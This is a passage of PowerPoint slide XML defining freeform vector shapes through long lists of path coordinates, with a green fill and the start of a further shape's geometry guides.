                      <a:pt x="1439" y="1215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="1214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1432" y="1212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1431" y="1205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="1203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1427" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1424" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="1190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1417" y="1186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1419" y="1186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="1182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1421" y="1179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1418" y="1182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1416" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1417" y="1176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1418" y="1170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1419" y="1161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1417" y="1157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1415" y="1156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1411" y="1155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1405" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1399" y="1140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1392" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1388" y="1142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1376" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1374" y="1146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1373" y="1140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1372" y="1138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1370" y="1137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1364" y="1137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1361" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="1132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1348" y="1135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="1133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="1136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="1136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1337" y="1136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1333" y="1129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1331" y="1135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1328" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1314" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1309" y="1137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="1138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1295" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1297" y="1140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1300" y="1140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="1143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1309" y="1151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1313" y="1153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1315" y="1154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1317" y="1157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1314" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1310" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="1154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1302" y="1152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1301" y="1150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1297" y="1153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1301" y="1155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="1157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1295" y="1153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1292" y="1155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1290" y="1157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1282" y="1154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1279" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1271" y="1144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1267" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1271" y="1148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1269" y="1150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1260" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1254" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1247" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1229" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1225" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1222" y="1146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1222" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1225" y="1153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1219" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1213" y="1163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="1166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="1166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1201" y="1165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="1165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="1166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1198" y="1170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="1173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="1175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1189" y="1175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1184" y="1178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1182" y="1179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1186" y="1182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1187" y="1183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1182" y="1189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="1191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1182" y="1203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1184" y="1209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1187" y="1216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1184" y="1215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1178" y="1212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1176" y="1212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1173" y="1213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="1213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1164" y="1208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1158" y="1206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="1203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1153" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1150" y="1191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1150" y="1187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="1185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1143" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1137" y="1172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="1162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1127" y="1153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="1150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1121" y="1148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1116" y="1146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1112" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1108" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1105" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1100" y="1151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1097" y="1155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1093" y="1159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1089" y="1159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1087" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1079" y="1154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1071" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1067" y="1144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1065" y="1137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="1132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1062" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1057" y="1126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1051" y="1121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1045" y="1116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="1111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1039" y="1110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1026" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1012" y="1117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1010" y="1118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="1118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="1117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="979" y="1117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="967" y="1117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="965" y="1117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940" y="1107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="920" y="1099"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="910" y="1095"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="1093"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="873" y="1094"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="1094"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="633" y="596"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="620" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="596"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="591" y="538"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="592" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="538"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="583" y="503"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="586" y="516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="503"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="34" y="342"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="342"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="258" y="1334"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="254" y="1331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="1325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="1319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="1316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="1315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="1313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="1312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="1311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="1313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="1315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="1318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="1320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="1320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="1323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="1324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="1325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="1326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="1328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="1329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="1331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="1334"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="66" y="637"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="637"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="82" y="634"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="634"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="140" y="599"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="139" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="599"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="144" y="594"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="141" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="594"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="156" y="588"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="151" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="588"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36195" name="Freeform 328"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="285" y="1815"/>
                <a:ext cx="36" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 36"/>
                  <a:gd name="T1" fmla="*/ 14 h 26"/>
                  <a:gd name="T2" fmla="*/ 22 w 36"/>
                  <a:gd name="T3" fmla="*/ 17 h 26"/>
                  <a:gd name="T4" fmla="*/ 19 w 36"/>
                  <a:gd name="T5" fmla="*/ 23 h 26"/>
                  <a:gd name="T6" fmla="*/ 16 w 36"/>
                  <a:gd name="T7" fmla="*/ 25 h 26"/>
                  <a:gd name="T8" fmla="*/ 12 w 36"/>
                  <a:gd name="T9" fmla="*/ 26 h 26"/>
                  <a:gd name="T10" fmla="*/ 8 w 36"/>
                  <a:gd name="T11" fmla="*/ 25 h 26"/>
                  <a:gd name="T12" fmla="*/ 1 w 36"/>
                  <a:gd name="T13" fmla="*/ 20 h 26"/>
                  <a:gd name="T14" fmla="*/ 0 w 36"/>
                  <a:gd name="T15" fmla="*/ 18 h 26"/>
                  <a:gd name="T16" fmla="*/ 1 w 36"/>
                  <a:gd name="T17" fmla="*/ 14 h 26"/>
                  <a:gd name="T18" fmla="*/ 5 w 36"/>
                  <a:gd name="T19" fmla="*/ 10 h 26"/>
                  <a:gd name="T20" fmla="*/ 8 w 36"/>
                  <a:gd name="T21" fmla="*/ 6 h 26"/>
                  <a:gd name="T22" fmla="*/ 13 w 36"/>
                  <a:gd name="T23" fmla="*/ 11 h 26"/>
                  <a:gd name="T24" fmla="*/ 15 w 36"/>
                  <a:gd name="T25" fmla="*/ 12 h 26"/>
                  <a:gd name="T26" fmla="*/ 18 w 36"/>
                  <a:gd name="T27" fmla="*/ 9 h 26"/>
                  <a:gd name="T28" fmla="*/ 20 w 36"/>
                  <a:gd name="T29" fmla="*/ 6 h 26"/>
                  <a:gd name="T30" fmla="*/ 20 w 36"/>
                  <a:gd name="T31" fmla="*/ 1 h 26"/>
                  <a:gd name="T32" fmla="*/ 24 w 36"/>
                  <a:gd name="T33" fmla="*/ 0 h 26"/>
                  <a:gd name="T34" fmla="*/ 31 w 36"/>
                  <a:gd name="T35" fmla="*/ 2 h 26"/>
                  <a:gd name="T36" fmla="*/ 35 w 36"/>
                  <a:gd name="T37" fmla="*/ 6 h 26"/>
                  <a:gd name="T38" fmla="*/ 36 w 36"/>
                  <a:gd name="T39" fmla="*/ 9 h 26"/>
                  <a:gd name="T40" fmla="*/ 31 w 36"/>
                  <a:gd name="T41" fmla="*/ 10 h 26"/>
                  <a:gd name="T42" fmla="*/ 28 w 36"/>
                  <a:gd name="T43" fmla="*/ 10 h 26"/>
                  <a:gd name="T44" fmla="*/ 24 w 36"/>
                  <a:gd name="T45" fmla="*/ 13 h 26"/>
                  <a:gd name="T46" fmla="*/ 23 w 36"/>
                  <a:gd name="T47" fmla="*/ 14 h 2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36"/>
                  <a:gd name="T73" fmla="*/ 0 h 26"/>
                  <a:gd name="T74" fmla="*/ 36 w 36"/>
                  <a:gd name="T75" fmla="*/ 26 h 2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36" h="26">
